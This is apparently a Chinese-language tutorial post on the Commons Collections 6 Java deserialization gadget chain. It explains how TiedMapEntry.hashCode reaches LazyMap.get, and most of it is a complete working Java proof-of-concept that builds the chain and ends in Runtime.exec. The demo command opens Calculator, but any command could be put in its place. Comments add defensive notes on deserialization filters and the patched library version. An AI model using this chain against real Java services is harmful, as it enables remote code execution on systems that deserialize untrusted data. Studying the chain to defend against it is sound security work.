CommonsCollections6链详解

世界上最好用的 CC 链

CommonsCollections6 详解

CommonsCollections1 的链子调用了 LazyMap 类中的 transform() 方法（由其 get() 方法触发），于是需要找一个会调用任意 Map 的 get() 方法的地方，这里换成了 TiedMapEntry


TiedMapEntry 的 hashCode() 方法调用了 getValue() 方法，getValue() 又调用了 map 的 get() 方法，并且这个 map 可控。hashCode() 这个入口很熟悉，因为在 URLDNS 链中 HashMap 类的 readObject() 方法就会调用 key 的 hashCode() 方法


于是构造如下 PoC：

package org.example.CommonsCollections;    
    
import org.apache.commons.collections.Transformer;    
import org.apache.commons.collections.functors.ChainedTransformer;    
import org.apache.commons.collections.functors.ConstantTransformer;    
import org.apache.commons.collections.functors.InvokerTransformer;    
import org.apache.commons.collections.keyvalue.TiedMapEntry;    
import org.apache.commons.collections.map.LazyMap;    
    
import java.io.FileInputStream;    
import java.io.FileOutputStream;    
import java.io.ObjectInputStream;    
import java.io.ObjectOutputStream;    
import java.lang.reflect.Field;    
import java.util.HashMap;    
import java.util.Map;    
    
/**
 * Proof of concept for the CommonsCollections6 deserialization gadget chain.
 *
 * <p>Trigger path: {@code HashMap.readObject()} calls {@code hashCode()} on each key it
 * reads; the key here is a {@code TiedMapEntry}, whose {@code hashCode()} calls
 * {@code getValue()}, which calls {@code get()} on the wrapped {@code LazyMap}. A missing
 * key makes {@code LazyMap} invoke its {@code factory} transformer, which at deserialization
 * time is the reflective {@code ChainedTransformer} built in {@link #main} and ending in
 * {@code Runtime.exec}. Nothing executes until {@code readObject()} runs.
 *
 * <p>Defensive notes: the sink is an unfiltered {@code ObjectInputStream.readObject()}
 * (see {@link #unserialize}). An {@code ObjectInputFilter} (JEP 290) that rejects
 * {@code org.apache.commons.collections.*} stops the chain before any transformer runs,
 * and commons-collections 3.2.2 and later refuse to deserialize {@code InvokerTransformer}
 * unless unsafe serialization is explicitly enabled. Detection-wise, a serialized
 * {@code HashMap} whose key is a {@code TiedMapEntry} wrapping a {@code LazyMap} with a
 * {@code ChainedTransformer} factory is the signature of this chain.
 */
public class CommonsCollections6 {
    /**
     * Builds the object graph and, as written, only deserializes an already existing
     * {@code ser.bin}; the {@link #serialize} call is commented out.
     *
     * <p>Statement order matters: the {@code TiedMapEntry} is inserted into {@code map2}
     * while the {@code LazyMap} still has a harmless factory, and the real factory is
     * swapped in by reflection only after the graph is complete.
     *
     * @param args ignored
     * @throws Exception any reflection or I/O failure
     */
    public static void main(String[] args) throws Exception{


        // Sink: Runtime.class -> getMethod("getRuntime") -> invoke -> exec(String), all via
        // reflection. None of this runs yet; a transformer only acts when transform() is called.
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> map = new HashMap<>();
        // Decorate with a harmless ConstantTransformer first, so that building the graph
        // below does not fire the real chain in this process; it is replaced further down.
        Map<Object, Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, "test");

        HashMap<Object, Object> map2 = new HashMap<>();
        // put() calls tiedMapEntry.hashCode() -> getValue() -> lazymap.get("test"); with the
        // harmless factory this only records the generated value for "test" in the backing map.
        map2.put(tiedMapEntry,"test1");

        // Remove that cached entry so "test" is absent again at deserialization time;
        // otherwise get() would find the key and never call the factory.
        lazymap.remove("test");

        // LazyMap exposes no setter for its factory, so swap it reflectively now that the
        // graph is complete. `c` is a raw Class; Class<?> would avoid the warning.
        Class c = LazyMap.class;
        Field factoryField = c.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lazymap,chainedTransformer);
        // serialize() would write the graph to ser.bin; only the readObject side is exercised here.
        //serialize(map2);
        unserialize("ser.bin");

    }
    /**
     * Writes {@code obj} to {@code ser.bin} in the working directory with Java serialization.
     *
     * @param obj the object graph to serialize
     * @throws Exception on I/O failure
     */
    public static void serialize(Object obj) throws Exception{
        // NOTE(review): the stream is never flushed or closed, so buffered output may be lost
        // and the file handle leaks; try-with-resources on the ObjectOutputStream would fix both.
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    /**
     * Reads one object from {@code filename} with a plain {@code ObjectInputStream}.
     *
     * <p>This is the unfiltered {@code readObject()} sink the chain relies on: no
     * {@code ObjectInputFilter} is installed, so any class on the classpath may be
     * instantiated and its {@code readObject} logic run before this method returns.
     *
     * @param filename path of the serialized file
     * @return the deserialized object
     * @throws Exception on I/O failure or when the stream cannot be deserialized
     */
    public static Object unserialize(String filename) throws Exception{
        // NOTE(review): the stream is never closed; try-with-resources would release the handle.
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));
        Object obj = ois.readObject();
        return obj;

    }
}
